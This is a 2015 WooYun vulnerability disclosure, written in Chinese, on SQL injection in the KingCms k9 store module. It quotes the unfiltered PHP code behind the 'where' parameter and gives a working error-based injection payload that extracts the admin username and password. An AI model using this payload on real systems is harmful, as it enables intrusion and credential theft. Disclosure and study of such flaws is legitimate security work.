当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0102490

漏洞标题:KingCms最新版(k9)注入3枚打包

相关厂商:KingCms

漏洞作者: 路人甲

提交时间:2015-03-20 14:16

修复时间:2015-05-04 14:18

公开时间:2015-05-04 14:18

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-03-20: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-05-04: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

KingCms最新版(k9)注入3枚打包

详细说明:

朋友的公司想购买kingcms的授权,让我帮忙看下。发现kingcms很长一段时间没更新了,憋了一段时间放出了最新版的k9(2014-12-13更新),官网下下来学习一下。
在wooyun上看到了几个漏洞,如: WooYun: kingcms最新版sql注入漏洞
注入点:POST /apps/store/index.php HTTP/1.1
注入参数:where 问题文件在 /apps/store/index.php
当$cmd分别为store,news,product时,分别会有三个漏洞,这里以$cmd=store为例进行说明。

function _create(){
$u=new user;$u->auth_role('store');
$db=new db;
$where=kc_get('where',0,1);
$pid=kc_get('pid',2,1);
$rn=kc_get('rn',2,1);
$limit=($rn*($pid-1)).','.$rn.';';
$cmd=kc_get('cmd',array('categroy','store','news','product'));
$pcount=kc_get('pcount',2,1);
$start=$rn*$pid>$pcount?$pcount:$rn*$pid;
$file=new file;
$fpath=kc_config('store.url');
if($cmd=='categroy'){
$res=$db->getRows('%s_store_categroy','*');
foreach($res as $rs){
$rs['TEMPLATE']='store/'.(empty($rs['template'])?'categroy.php':$rs['template']);
$file->create($rs['url'],$rs);
}
}else if($cmd=='store'){
$sids=$db->getRows_two('%s_store','sid','sid',$where,'',$limit);
$store=new store;
$store->create($sids);
}else if($cmd=='news'){
$res=$db->getRows('%s_store_news','*',$where,'',$limit);
$store_urls=array();
foreach($res as $rs){
if(empty($store_urls[$rs['sid']])){
$store=$db->getRows_one('%s_store','url','sid='.$rs['sid']);
if(empty($store)){
$db->delete('%s_store_news','sid='.$sid);
kc_tip('所属店铺数据丢失,已删除对应数据,请重新生成!','form');
}
$store_urls[$rs['sid']]=$store['url'];
}
$url=$store_urls[$rs['sid']];

$rs['tmpfile']='news.page.php';
$file->create($url.'news/n'.$rs['id'].'/',$rs,$url.'config.php');
}
}else if($cmd=='product'){
$res=$db->getRows('%s_store_product','*',$where,'',$limit);
$store_urls=array();
foreach($res as $rs){
if(empty($store_urls[$rs['sid']])){
$store=$db->getRows_one('%s_store','url','sid='.$rs['sid']);
if(empty($store)){
$db->delete('%s_store_product','sid='.$sid);
kc_tip('所属店铺数据丢失,已删除对应数据,请重新生成!','form');
}
$store_urls[$rs['sid']]=$store['url'];
}
$url=$store_urls[$rs['sid']];

$rs['tmpfile']='product.page.php';
$file->create($url.'product/n'.$rs['id'].'/',$rs,$url.'config.php');
}
}

$js="\$.kc_progress('#progress_{$cmd}',{$start},{$pcount});";
$js.=$start==$pcount ? "\$('.Submit').removeAttr('disabled');":"\$.kc_ajax({URL:'".FULLURL."apps/store/index.php',CMD:'create',cmd:'$cmd',where:'$where',pid:".($pid+1).",rn:{$rn},pcount:{$pcount}});";
kc_ajax(array('JS'=>$js));
}


又调用了kc_validate,再去看看

function kc_validate($s,$type){
$reg='';
switch($type){
case 1:$reg='/^[a-zA-Z0-9]+$/';break;
case 2:$reg='/^[0-9]+$/';break;
case 3:$reg='/^([0-9]+,)*[0-9]+$/';break;
case 4:$reg='/^[A-Za-z0-9\_]+$/';break;
case 5:
$reg='/^\w+([-+.]\w+)*@\w+([-.]\w+)*\.\w+([-.]\w+)*$/';break;
case 6:
$reg='/^[a-zA-Z]{3,10}:\/\/[^\s]+$/';
break;
case 7:
$reg='/^([a-zA-Z]{3,10}:\/\/)?[^\s]+\.(jpeg|jpg|gif|png|bmp)$/';
break;
case 8:
$reg='/^((((1[6-9]|[2-9]\d)\d{2})-(0?[13578]|1[02])-(0?[1-9]|[12]\d|3[01]))|(((1[6-9]|[2-9]\d)\d{2})-(0?[13456789]|1[012])-(0?[1-9]|[12]\d|30))|(((1[6-9]|[2-9]\d)\d{2})-0?2-(0?[1-9]|1\d|2[0-8]))|(((1[6-9]|[2-9]\d)(0[48]|[2468][048]|[13579][26])|((16|[2468][048]|[3579][26])00))-0?2-29)) (20|21|22|23|[0-1]?\d):[0-5]?\d:[0-5]?\d$/';
break;
case 9:
$reg='/^((((1[6-9]|[2-9]\d)\d{2})-(0?[13578]|1[02])-(0?[1-9]|[12]\d|3[01]))|(((1[6-9]|[2-9]\d)\d{2})-(0?[13456789]|1[012])-(0?[1-9]|[12]\d|30))|(((1[6-9]|[2-9]\d)\d{2})-0?2-(0?[1-9]|1\d|2[0-8]))|(((1[6-9]|[2-9]\d)(0[48]|[2468][048]|[13579][26])|((16|[2468][048]|[3579][26])00))-0?2-29))$/';
break;
case 10:$reg='/^\d?\.\d?\.\d{4}$/';break;
case 11:$reg='/^((2[0-4]\d|25[0-5]|[01]?\d\d?)\.){3}(2[0-4]\d|25[0-5]|[01]?\d\d?)$/';break;
case 12:$reg='/^(\d+(\.\d+)?)$/';break;
case 13:$reg='/^([0-9A-Za-z]+,)*[0-9A-Za-z]+$/';break;
case 14:$reg='/^#?[0-9A-Fa-f]{6}$/';break;
case 15:$reg='/^([a-zA-Z0-9\_\-]+\/)+$/';
$s=preg_replace('/\{([a-zA-Z0-9]+)\}/','$1',$s);//替换{ID}等类型为ID
$path=preg_replace('/(([a-zA-Z0-9\_\-]+\/)*)([a-zA-Z0-9\_\-]+\/)/','$3',$s);
//kc_tip($path,'form');
//if(preg_match('/^[pP]\d+$/',$path)){return false;}
break;
case 17:$reg='/^([a-zA-Z]{3,10}:\/\/)[^\s]+$/';break;
case 18:
$reg='/^((((1[6-9]|[2-9]\d)\d{2})-(0?[13578]|1[02])-(0?[1-9]|[12]\d|3[01]))|(((1[6-9]|[2-9]\d)\d{2})-(0?[13456789]|1[012])-(0?[1-9]|[12]\d|30))|(((1[6-9]|[2-9]\d)\d{2})-0?2-(0?[1-9]|1\d|2[0-8]))|(((1[6-9]|[2-9]\d)(0[48]|[2468][048]|[13579][26])|((16|[2468][048]|[3579][26])00))-0?2-29)) (20|21|22|23|[0-1]?\d):[0-5]?\d$/';
break;
case 22:$reg='/^(\-|\+)?[0-9]+$/';break;
case 23:$reg='/^[a-zA-Z][a-zA-Z0-9\_]*/';break;
case 24:$reg='/^([a-zA-Z0-9\-_]+\/)+$/';break;
case 25:$reg='/[a-zA-Z0-9\+\%]+(\=)*$/';break;
case 33:$reg='/^(\-?[0-9]+\,?)+$/';break;
case 34:$reg="/^[^\s!-\/:[email protected]\[-`\{-~]+$/";break;
default:$reg=$type;break;
}
//如果为数组类型
if (is_array($reg)) {
$bool=in_array($s,$reg);
}else{
$bool= empty($type)
? true
: (empty($reg) ? false : (bool)preg_match($reg,$s));
}
return $bool;
}


因为在使用kc_get得到where时,参数type是0,因此,kc_validate的参数type也是0,也就使得kc_validate返回true。也就是说再得到where时,没有对where进行类型的检验,可以引入单引号,造成了注入。
$_POST['where']进入$db->getRows,去看看$db->getRows

public function getRows($table,$insql='*',$where=null,$order=null,$limit=null,$group=null) {
$table=str_replace('%s',DB_PRE,$table);
$sql="SELECT $insql FROM $table ";
$sql.= empty($where) ? '' : " WHERE $where";
$sql.= empty($group) ? '' : " GROUP BY $group";
$sql.= empty($order) ? '' : " ORDER BY $order";
$sql.= empty($limit) ? '' : " LIMIT $limit";
return $this->get($sql);
}


在执行sql语句之前,也没有过滤,这里就造成了注入。
Kingcms可以报错,因此
Payload:

jsoncallback=1&_=11&URL=http%3A%2F%2Flocalhost%2Fapps%2Fcontent%2Fcategroy.php&CMD=create&TID=1&AJAX=1&USERID=10000&SIGN=89ee81f5f1f328f555ceb7e7655d9f2f&pid=1&rn=2&cmd=content&pcount=1&where=0 UNION SELECT 1 FROM(SELECT COUNT(*),CONCAT(0x23,(SELECT concat(username,0x23,userpass)FROM king_user LIMIT 0,1),0x23,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.tables GROUP BY x)a%23


注入成功,见下图

成功副本.jpg

漏洞证明:

见 详细说明

修复方案:

过滤

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝